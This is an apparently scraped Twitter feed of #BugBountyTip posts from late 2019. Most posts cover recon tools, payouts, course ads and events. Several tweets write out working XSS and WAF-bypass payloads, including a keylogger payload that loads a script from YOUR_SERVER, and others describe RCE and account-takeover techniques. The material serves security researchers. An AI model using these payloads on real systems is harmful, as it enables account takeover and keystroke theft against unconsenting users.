Ankit Thakur @bsidesahmedabad
@rudra16t


2019-11-14 09:00:01
1 Yeah looking forward to see you all at @bsidesahmedabad #bsidesahmedabad #infosec #bugbounty #BugBountyTip https://t.co/5HTiT8AQF2
Wh11teW0lf
@Wh11teW0lf


2019-11-14 06:54:48
0 #BugBountyTip Yesterday I found disclosure of AWS keys via /AWSconf.git/ folder instead of /.git/ folder
tololovejoi
@tolo7010


2019-11-14 06:42:39
0 Hacking doesn't take some times, it takes forever. #bugbounty #bugbountytip #bugbountytips #hacking
Evan Custodio
@defparam


2019-11-14 04:53:14
0 Gotta take breaks from hacking clear your mind. Stayed away from the computer last weekend and spent all Saturday plumbing in this sleek softener system with my buddy. Started recon again and filed 2 High/Crit HTTP Request Smuggling bugs today. Stay rested y’all #BugBountyTip https://t.co/8GeWvj0YO9
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-14 04:37:17
3 CloudFlare XSS Bypass Payload: <a"/onclick=(confirm)()>Click Here! #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
bugbountytip
@a_l_e_r_t_1_


2019-11-13 23:51:28
0 Now again less than 1$ !!! (short time) (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/3eMttPxf6k
Alex Birsan
@alxbrsn


2019-11-13 20:21:12
0 #bugbountytip: Give some non-platform programs a try! No stats to worry about, no drama, no superfluous processes. Just you and the scope. https://t.co/dJRxMEekdO
Mourad
@SecuAudit


2019-11-13 17:51:56
0 Terrible Experience - Unfortunately with asian gaming companies at @Hacker0x01 programs , mostly they even don't answer msgs ... really not a very good experience . #bugbounty #BugBountyTip
Gwendal Le Coguic
@gwendallecoguic


2019-11-13 16:51:45
1 Oneliner to resolve the host of a given url #bugbountytip #tools #onliner host `echo $url|sed "s/.*:\/\///"|cut -d '/' -f 1|cut -d '@' -f 2|cut -d':' -f 1` https://t.co/DYokxgu5B4 https://t.co/ZnkGnGvBsy
yourXss
@yourXss


2019-11-13 16:00:00
3 TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT👁️
Hussein Daher
@HusseiN98D


2019-11-13 15:58:28
3 TimeForA #BugBountyTip I use https://t.co/TKsmKBnl8M to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT👁️
Noman | نعمان | नोमान
@nomanAli181


2019-11-13 15:56:14
0 Took hours to turn this from 'possible' SQL Injection to finally exploit it coz It was Blind + webserver was blocking a bunch of chars. Learn SQL syntax coz sqlmap won't help/work in all cases ;) #bugbounty #bugbountytip https://t.co/B29DV9d0Bw
HackIsOn ®
@hackison


2019-11-13 14:36:43
0 Credits: @erbbysam #bugbounty #bugbountytips #BugBountyTip https://t.co/zqGpyjfaWp
Ammar Amer🇸🇾
@cry__pto


2019-11-12 19:30:18
6 -Getting Started in BugBounty Hunting.pdf https://t.co/ZSTyAcvGQx -OSCP-Survival-Guide.pdf: https://t.co/bmTXPteO6m -TLS&SSL Penetration Testing.pdf: https://t.co/HsFlycdTAc -Evil Twin Attack:The Definitive Guide.pdf: https://t.co/IjzR0QaAJp #bugbountytip #hacking #Pentest #OSCP
bugbountytip
@a_l_e_r_t_1_


2019-11-12 18:50:47
1 Now less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Hussein Daher
@HusseiN98D


2019-11-12 17:20:38
22 Time for another #BugBountyTip : While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if ".asp" extension is blacklisted. This already led me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming 👁️
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-12 13:42:22
2 Here is a nice Bootstrap vector that has recently been added to the XSS cheat sheet by <xss class=progress-bar-animated onanimationstart=alert(1)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
Yadhavi
@PrincessYadhavi


2019-11-12 12:37:25
0 somewhere i heard about a tool which can grep through burp saved files(sitemap -> right click,-> save selected items). i forgot the name. anyone know about? #bugbounty #bugbountytips #bugbountytip #burpsuite
Hussein Daher
@HusseiN98D


2019-11-12 11:17:30
4 CHEAP VPS UBUNTU SERVERS: I receive many messages asking where to get a cheap/good VPS for #bugbounty You can have a good server for as low as $2/month by using my 50% discount code D98KTCA15Y on https://t.co/xl74Mwv0PB ! BTC payment supported #bugbountytips #bugbountytip
0day work
@0daywork


2019-11-12 00:57:50
0 #BugBountyTip Always check for #RaceConditions when redeeming coupons to get greater discounts and huge bounties ;-) #Bugbounty #OWASP #ITSecurity https://t.co/k3ZlbRmVBO
stoXe
@DevinStokes


2019-11-11 23:09:16
6 Remote XSS Keylogger: Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> This will log a user's input to your remote server. #BugBounty #BugBountyTip #XSS https://t.co/WvH30bUbyF
m0z
@LooseSecurity


2019-11-11 20:48:29
1 League of Bounties: Almost 600 members and growing! Ask your #BugBounty questions and get #bugbountytips from the top bug bounty hunters and whitehat hackers in the community. #BugBountyTip Joining our discord increases bug bounty luck by 15%. https://t.co/WTsdy7VJXI
Mourad
@SecuAudit


2019-11-11 20:22:33
0 i've accumulated more than 10 reports closed as informative this week , time to take a break relax and evaluate my pentesting approach #bugbountytips #BugBountyTip https://t.co/nnJ3KLJVYr
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:36:40
0 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/ITiMzEy1ED
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:29:34
3 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/uNTTXRVKRA
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:28:36
0 Malware Alert !!! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/jGlhtpTFpR
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-11 15:23:23
2 Here I want to share with you this magnificent. > Application bypass < <%0crameset%20src=''> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security https://t.co/nN7haNHr97
ALL ABOUT HACKER
@AboutHacking


2019-11-11 13:38:35
3 Understanding HTTP Headers and cookie. Read: https://t.co/ZcHq5v6Ri8 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/W0zQT2sn9D
intigriti
@intigriti


2019-11-11 12:46:04
6 [email protected]'s #BugBountyTip: Check JSON responses for additional properties, and send them back! 👀#HackWithIntigriti https://t.co/qIwEXtV9S8
Henry Chen
@chybeta


2019-11-11 10:54:10
0 Apache Flink Dashboard -> upload a malicious JAR -> submit new job -> getshell #bugbounty #bugbountytips #BugBountyTip https://t.co/lWNNCXHvvt
bugbountytip
@a_l_e_r_t_1_


2019-11-11 10:11:42
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/AoovNBqGht
Brodie Codie
@brodie_codie


2019-11-10 22:45:20
0 Tip 1. Passive, Active scanning and enumeration Probe the target Gather as much information about the target as possible Short List of Tools i like (Amass, Assetfinder, Pdlist, Dnsrecon, Dig, Wafw00f, Masscan, Dirsearch ) What tools do you like? #bugbountytips #BugBountyTip
ghostlulz
@ghostlulz1337


2019-11-10 22:15:04
8 You have probably heard of Subdomain Hijacking (takeover) but what about Broken Link Hijacking? You can utilize this vulnerability to get some easy Stored XSS wins. More info on my blog: https://t.co/Up6LfsdBs7 #bugbounty #bugbountytip #bugbountytips #infosec #redteam #pentest #xss https://t.co/uKA4V3uOZZ
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-10 21:56:46
0 Bypass is required if you need to use quotes in some encodings where single and double quotes are blocked <IMG SRC=`javascript:alert(“Halil?, ‘XSS’”)`> #BugBounty #XSS #BugBountyTip #infosec #Bypass
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-10 21:55:46
0 Let's say they blocked the site with nail. What will we do? Here is the solution: <IMG SRC=javascript:alert("XSS")> #BugBounty #XSS #BugBountyTip #infosec #Bypass
bugbountytip
@a_l_e_r_t_1_


2019-11-10 21:03:44
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
0day work
@0daywork


2019-11-10 20:47:57
3 #BugbountyTip: Change request parameters from scalar (val=foo) to array (val[]=foo) for #XSS #Bugbounty #OWASP https://t.co/eVOBz8WtwT
Tannay Bagga
@BaggaTannay


2019-11-10 19:56:19
0 Getting my hands on docker for building #Recon tools.I must say it makes the installation task so hassle free!#bugbountytips #opensource #BugBountyTip #Docker
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-10 19:21:56
0 Mass RDP ATTACKS #BlueKeep Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/NTSGfnFBo5
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-10 18:49:55
2 Linux Commands for Bug Hunters and Hackers !! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip https://t.co/GIgkZB5KK9
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:33:29
2 Sometimes login endpoints submit the password twice in POST data. If you need to perform a credentials guessing attack with Burp Suite: 1) Use Cluster bomb, 2) Use "Copy other payload" to copy from 1st password placeholder. See pictures. #burpsuitetip #bugbounty #bugbountytip https://t.co/pY7ga2bbsb
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:20:31
7 I've been testing newer versions of #ffuf by @joohoi. It's dope being able to fuzz for files w/ 100 threads at 350reqs/sec w/ nearly no failures/stability issues! If you need BOTH stability & speed, then #ffuf is the only tool you need for web fuzzing. #bugbounty #BugBountyTip https://t.co/bWhywAAvVx
Ismayil Tahmazov
@Tismayil1


2019-11-10 18:20:10
5 Sometimes we have to do the impossible. SQL'Injection Attempt from Remote Site With this method: XSS, SQL'i, CSRF attacks can be done. Failure to filter the data from the remote source leaves open doors for such attacks. #bugbountytips #BugBountyTip #bugbounty #whitehat https://t.co/bb29oBdpGL
Infected Drake
@0xInfection


2019-11-10 13:33:03
8 Hey folks, v2.1.1 of XSRFProbe is out! \o/ So whether you're stuck at an endpoint with forms in it or looking to learn about how cross site request forgeries (CSRF) work, give this toolkit a try. 😉 https://t.co/OKUlxHNUO3 #infosec #appsec #bugbounty #bugbountytip https://t.co/5NMCR7YRMq
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-10 11:04:00
3 Indispensable xss bypass payload. ">'><details/open/ontoggle=confirm('XSS')> #BugBounty #XSS #BugBountyTip #infosec
bugbountytip
@a_l_e_r_t_1_


2019-11-10 08:26:32
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5ryR3 #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
ALL ABOUT HACKER
@AboutHacking


2019-11-10 07:35:08
0 Cross Site Scripting attack Basic to advance [ part 6] Read:https://t.co/H4hJHhsdO5 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/HkDrjRxblY
Shantanu Kulkarni
@Iamshantanukul


2019-11-10 06:58:55
0 If you can determine which open source packages are used in the application you are attacking, you can download these and perform a code review or install them to experiment on. A vulnerability in any of these may be exploitable to compromise the wider application #BugBountyTip #bugcrowd #hackerone
Hussein Daher
@HusseiN98D


2019-11-10 00:02:37
15 Sharing one of my secrets #BugBountyTip When discovering subdomains/domains/assets owned by a company, use the Google Analytics ID to expand your attack surface. The ID is in the HTML code. Reverse search then: https://t.co/fkWSWj8GUn RT once this helps!#bugbountytips #infosec
ALL ABOUT HACKER
@AboutHacking


2019-11-09 20:55:07
0 Cross Site Scripting Attack Series [Basic to Advance] Read: https://t.co/xZTIBcHlHr #cybersecurity #bugbounty #bugbountytip #bugbountytips #hacking https://t.co/QCQPhiYPtu
Murdockz
@Murdockz_CEH


2019-11-09 20:45:45
1 Remember this picture and date it was posted. When I share that I was rewarded XXXXX amount for a bug...you now know why. Step back learn and work hard to hit harder. 😎 #bugbountytips #bugbountytip #StayHumble https://t.co/69lsVZNGPt
Paulos Yibelo
@PaulosYibelo


2019-11-09 18:04:05
1 I started seeing posts about escalating bugs for maximum impact. This is an article I wrote about how to escalate XSS for maximum gain back in Feb 2018: https://t.co/W7sZLunr6N #BugBounty #BugBountyTip #BoomerAdvice
Avi
@avileox


2019-11-09 03:28:43
2 Small Python library that makes it easy to exploit race conditions in web apps with Requests https://t.co/bkBGTn8SNu #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-09 00:11:43
0 Less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ismayil Tahmazov
@Tismayil1


2019-11-08 23:16:27
2 I Earned $XXXX OS Command Injection Private Program. Used Repos 1 : Dir Searcher : https://t.co/1L6MutcaEc 2 : Sub Scanner : https://t.co/ZRcZb6ovUa #BugBounty #bugbountytips #bugbountytip #whitehat https://t.co/OPOc6mVkTc
Ammar Amer🇸🇾
@cry__pto


2019-11-08 21:34:35
7 -Hacking for Beginners.pdf: https://t.co/aQoLE86OKL -HTB: CTF.pdf: https://t.co/PCbL2YSGZR -HTB_ Hackback.pdf: https://t.co/Jz1m0qlU2a -Keep Calm and Hack The Box - Devel.pdf: https://t.co/Jz1m0qlU2a #bugbountytips #Hacking #redteam #Pentesting #infosec #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-08 13:20:02
0 Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Brute Logic
@brutelogic


2019-11-07 23:37:34
1 Great stuff here, check this out! #bugbountytip #IDOR #BOLA https://t.co/2q0MbSeOie
Arif Khan
@payloadartist


2019-11-07 21:25:23
2 LiveTargetsFinder - tool to automate #bugbounty recon. #bugbountytip https://t.co/aP0oQC0qdr
Nick || hunt4p1zza
@ngkogkos


2019-11-07 17:47:02
0 Agree with Jason here, it is a good #bugbountytip but need to be cautious. I would only set up an AutoRepeater/Burp rule for true/false, if I was highly familiar with my test user's data and the website's behavior. #bugbounty https://t.co/iMVChw8zkX
Karna
@karna__1


2019-11-07 15:41:35
0 Burned out? Bored? Need a really cool time-pass? I dare you to enter https://t.co/sJMORd6dlX All the @PortSwiggerRes content are 🔥🔥🔥 Soo much to learn. Just go bring your geek-self out! #research #infosec #bugbountytip #bugbountytips #hackers #hacking #geeks
warbid
@id_warb


2019-11-07 14:41:19
0 Use PDO they said PDO will save you from SQL injections they said #bugbountytip https://t.co/NUtccgqMR7
intigriti
@intigriti


2019-11-07 13:04:04
18 Looking for business logic flaws 👀? Flows with multiple steps are a good place to start. Try to skip steps or execute them in a wrong order and see what happens 😈 Thanks for the #BugBountyTip, @InsiderPhD! https://t.co/bw6Z28K6fE
bugbountytip
@a_l_e_r_t_1_


2019-11-07 06:51:34
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
darkmage
@therealdarkmage


2019-11-06 22:22:45
0 Got a $50 Amazon giftcard for reporting an #XSS to a company with no #bugbounty program. #bugbountytip: If you find a bug on a website/app that does not appear to have an active program, take heart and have courage and faith! Report it and see if they can compensate you🤘#infosec https://t.co/2Kql2FconG
Vinothkumar
@vinothpkumar


2019-11-06 16:57:18
0 Wrote a blog on "Publicly Exposed AWS SNS Topics" #bugbounty #Bugbountytip #aws #security https://t.co/wfNbUHHpjT
Pavandeep
@Pavandep8


2019-11-06 16:12:14
2 Look what I shared: When I found iframe injection and illegal redirect (dom based) @MIUI| #Hacker #privacy #Bugbountytip #security https://t.co/TnU1JRjUDm
intigriti
@intigriti


2019-11-06 15:34:54
12 Sometimes, TRUE is all you need ✅. Use @Burp_Suite's match and replace to enable new functionalities in the UI and expand your attack surface! Thanks for the #BugBountyTip, @anshuman_bh! https://t.co/D55uMIl6Sx
Aditya Soni
@hetroublemakr


2019-11-06 14:43:08
0 Still any confusion about CVE2019 14287 Go and watch this video #infosec #Bugbountytip https://t.co/i4Mye3n7qO
Jinone
@jinonehk


2019-11-06 04:38:05
4 My first bounty blog post Get the full content of the private project internal network via ssrf https://t.co/MhKS2w6L0Z Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip
Arif Khan
@payloadartist


2019-11-05 19:42:20
2 Very creative way to Abuse (cross-site authenticated) HEAD Requests leading to GitHub Oauth Bypass by @not_aardvark https://t.co/dX0lF2LVJ4 #bugbounty #bugbountytip
Abay
@abaykandotcom


2019-11-05 18:59:39
0 Actually these 2 findings are invalid. However, the interesting part is where and how the XSS payload is triggered~ #ripenglish #XSS #bugbountytip #bugbounties #bugbounty https://t.co/idpR2U41zn
YogoshaOfficial
@YogoshaOfficial


2019-11-05 16:10:19
5 [#Bugbountytip] Tomcat is used, yet port 8080 is filtered? Use port 8009, which is "often" forgotten. It uses AJP instead of HTTP, so use your local apache as local proxy to convert traffic from HTTP to AJP. ProxyPass / ajp://target-ip:8009/ ProxyPassReverse / ajp://target-ip:8009/
Felix Kybranz
@_cybrg


2019-11-05 12:53:54
0 Got too many results from google dorks? Remove uninteresting buzzwords with: "-" site:http://paypal. com -demo -Capital Why did I miss that for so long!? Finding that was a nice wtf-moment😇 #BugBounty #bugbountytips #bugbountytip #bugbounties
m0z
@LooseSecurity


2019-11-05 12:05:14
6 #BugBounty #bugbountytip #XSS Have an XSS and want to get account takeover but document.cookie isn't working? Try a payload which grabs the CSRF token, and then sends a request to the change email endpoint to change it to your email! Now your bug is twice as valuable. ;)
bugbountytip
@a_l_e_r_t_1_


2019-11-05 07:39:35
0 Reflected XSS on Magento #BugBountyTip #BugBountyTips https://t.co/KQSpPV2Q0m via @YouTube
Anshuman Pattnaik
@anspattnaik


2019-11-05 00:29:38
0 #bugbountytip #Google I got a strange thing to know that if google user gives certain access to a third party application then as per google policy guidelines that third application has complete ownership of the user's private information such Gmail, Drive and other services.
(((Gamliel)))
@Gamliel_InfoSec


2019-11-05 00:19:18
0 If you are pentesting/bug hunting in some web app that uses JSON and it runs on IIS, don't forget to test "JSON Parameter Pollution". Under some conditions you can poison some parameters, break Javascript context and voilà ... #XSS #hack2learn #GivingBack2Community #BugBountyTip https://t.co/MjN3o8pVgH
m0z
@LooseSecurity


2019-11-04 22:46:32
3 Here's a useful #XSS payload which doesn't suffix "prompt" with any parenthesis! Object.defineProperty(window, 'p', { get: prompt });p; By using a Getter, we invoke the prompt without any input! Ideal for bypassing WAF! #BugBounty #bugbountytips #bugbountytip #bugbounties
Ashish Kunwar
@D0rkerDevil


2019-11-04 15:32:18
1 Found Java_rmi service on port 8001, used nmap "rmi-dumpregistry" script to dump the class path. Found some goodies .. #bugbounty #bugbountytips #bugbountytip #security
KNOXSS
@knoxss_me


2019-11-04 13:46:16
1 One of #KNOXSS exclusive features! #XSS #bugbountytip https://t.co/SDP6thBcrz
Ashish Kunwar
@D0rkerDevil


2019-11-04 12:21:16
1 #bugbountytip Look out for port 2181 - zookeeper, check if you are able to run commands, as there is no auth in place by default in zookeeper installations. #bountytip #bugbountytips #protips #bugbounty #security
Leonel Emiliano
@leoalgare


2019-11-04 12:09:59
0 POST request with json body with no csrf token but also no CORS? Always test changing the content-type to urlencoded... It works like a charm. #bugbountytips #bugbountytip #hackerone #CSRF #Hacker0x01
Milind Purswani
@MilindPurswani


2019-11-03 17:38:13
0 Had a pyserver running on my VPS for days. Shodan scanned it and saved the response lol. Is this how "karma" works? #bugbountytip
VT10 Loading 🥊🥊🔥🔥🔥
@SHIVAPURI12


2019-11-03 17:10:49
1 #MegaStar Lu oorike ayiporu,, aaaaah style,,,aaah energy ,, aaah Grace,, Ever green and Irreplaceable ,, #BossForAReason #MegaStatChiranjeevi Garu ❤️💓❤️ at #bugbountytip finals,, #EmperorOfEntertainment #MegaStar #ChiruForEver Thanks to @StarMaa
Maulik Vaidh🇮🇳 @bsidesahmedabad
@Maulik1827


2019-11-03 15:46:18
0 @bsidesahmedabad 12 Days to go... Are you excited?😃😃 #bsides #bsidesahmedabad #bugbountytip #infosec #hacking #security #conference #BugBounty https://t.co/EjmNa9ukkn
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 🎃
@spyerror


2019-11-03 04:19:08
7 cloudflare {`XSS´} «byPASS» payloads. @spyerror🎯 🥇 $cat /<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> 🥈 $cat /<svg%0Aonauxclick=0;[1].some(confirm)// #BugBounty #BugBountyTip #WAF #infosec
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:11:49
0 Bug Reported to Author. 8K+ Active sales. Script after redirect worked admin account then stored to frontend area. #bugbounty #bugbountytips #bugbountytip https://t.co/6N1XwtnN28
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:10:10
0 CodeCanyon Most Popular Item. Found : CSRF -> Stored XSS. 1 - HTML form auto submit to : admin/knowledge_base/article 2 - Payload direct worked after redirect. 3 - Admin area and Frontend area payload stored. 2/1 #bugbounty #bugbountytips #bugbountytip https://t.co/RiUgDz9GHq
Arif Khan
@payloadartist


2019-11-02 18:55:25
1 Good read: Smuggling HTTP requests over fake WebSocket connection by @0ang3el https://t.co/x1CxQyCq7u #bugbounty #bugbountytip
Arif Khan
@payloadartist


2019-11-02 16:21:33
2 Nice write up by @nj_dav on Abusing HTTP hop-by-hop Request Headers https://t.co/cEB4iFqnOG… #bugbounty #bugbountytip
Fisher
@Regala_


2019-11-02 14:28:40
2 Making the most out of live hacking events 101: 📚 Focus on learning 👥 Meet, connect and collaborate 💯 Give your absolute best always 🥳 Have fun and enjoy #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-02 14:27:54
1 Now, Jenkins and Jira vulns are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Arif Khan
@payloadartist


2019-11-02 13:26:40
6 Nice write up by @daveysec on Abusing HTTP hop-by-hop Request Headers https://t.co/3VwrseBOta #bugbounty #bugbountytip
Andri Wahyudi 📂
@andripwn


2019-11-02 09:41:01
0 Remote Code Executions (RCE) - Bypassing Extension .png Private_Programs on @Hacker0x01 sad this duplicate :'( #bugbounty #bugbountytip #rce https://t.co/oMPTakOseD
Nikhil Mahajan
@mahajan344


2019-11-02 09:01:49
1 Thanks @detectify for another payout. #bugbountytip : If you have a vulnerability and that can be validated on the fly, try to automate that bug with #detectify scanner. With the help of automation, you don't have to worry about target :) #bugbounty #automation #ItTakesACrowd https://t.co/LjTNwXk5Ol
bugbountytip
@a_l_e_r_t_1_


2019-11-01 17:32:16
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-01 09:20:33
1 #SWAG 🏆🏆 Symantec 🏆🏆💰💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/EQfIvhpHD0
Ismayil Tahmazov
@Tismayil1


2019-11-01 07:25:06
0 Yes I Awarded $XXX. @instra Thanks For Bounty. #bugbounty #bugbountytip #bugbountytips
dark_warlord14
@dark_warlord14


2019-10-31 16:25:28
0 One must read blog post for beginners like me. Hats off to the author. #bugbountytips #bugbountytip https://t.co/ZtjGcCmSIz
Arif Khan
@payloadartist


2019-10-31 16:04:44
1 Wanted to add more juice to your #bugbounty recon? Grab this while its hot!!! Pricing is down to $10 from $50. Bonus - if u use my referral code, c5df8625, both of us get 500 credits more!!! #bugbountytip #halloween2019 https://t.co/WWbHqqLSHo
sagar yadav
@sagaryadav8742


2019-10-31 13:01:27
0 Happy to secure @readmeio 😍 Soon I will get a nice #swag from https://t.co/zcDAQyTUV0 Program link :- https://t.co/eRXN5RdYW0 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 https://t.co/NrtLkkroHi
sagar yadav
@sagaryadav8742


2019-10-31 12:52:27
0 @zerocopter swag 😍 Happy to #secure #zerocopter #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/RSdeOn5Kjb
Hussein Daher
@HusseiN98D


2019-10-31 11:01:04
0 Please RT and add your suggestions #bugbounty #infosec #bugbountytip #bugbountytips
Max
@0xw2w


2019-10-31 09:52:20
0 Found a changing session cookie, that applying to the user’s session during login to the account? Try logout CSRF + cookie setting (using XSS/CRLF inj/etc) to takeover a session when the user entered login and password again #bugbountytip #bugbounty #infosec
jub0bs
@jub0bs


2019-10-31 07:38:46
0 #bugbountytip Go deep on recon; go broad on targets.
Samet ŞAHİN
@sametsahinnet


2019-10-31 05:44:47
0 Here is a Google dork for finding ports ; inurl:"https://t.co/q4DIBVJDSJ" #BugBountytip #bugbounty #bugbountytips #Hacking #TogetherWeHitHarder https://t.co/UWdzDXZyhf
(((Gamliel)))
@Gamliel_InfoSec


2019-10-31 04:00:38
0 Added to Fav and waiting to test in a new project. #infosec #hacking #bugbountytip #pentesting #oneliner https://t.co/M5HhlBC8uI
Akshansh Jaiswal
@Akshanshjaiswl


2019-10-31 01:22:25
0 Yay, I was awarded a $1,000 bounty on @Hacker0x01! Account takeover->Make victim login to attacker's account->Make victim account unable to login to his orignal account. https://t.co/JKjOn6nSaA #TogetherWeHitHarder #bugbounty #bugbountytip https://t.co/26tKODyKX4
Shaked Klein Orbach 🇮🇱
@shakedko


2019-10-30 23:10:37
0 Many times I end up finding a test.php with "SIze: 0". I tend to assume that it's there for something, so most likely I will have to guess some parameters. I tried parameth but it didn't work well. Other ideas? #BugBounty #BugBountyTip CC @joohoi - using ffuf
Mohamed R Serwah
@serWazito0


2019-10-30 22:58:55
0 😅 any idea to get privilege escalation after login to ftp using anonymous username ?? #bugbountytip
Ismayil Tahmazov
@Tismayil1


2019-10-30 22:23:15
0 New Fast Subdomain Scanner My First GO experience. Your feedback is important to me. Hopefully it benefits your business. https://t.co/2o2pfa8Pi1 #bugbounty #bugbountytip #bugbountytips https://t.co/HHgGwcRfJ9
m0z
@LooseSecurity


2019-10-30 17:41:20
4 A lot of Self XSS is actually just POST XSS. Check if it has a CSRF token! Use your CSRF bypassing techniques to convert it. I've done this before, turned a useless self xss into a $1,000 vulnerability! Stored self XSS? Try a login CSRF chain! #BugBounty #bugbountytip
Dhamu
@Dhamu_offensi


2019-10-30 16:51:04
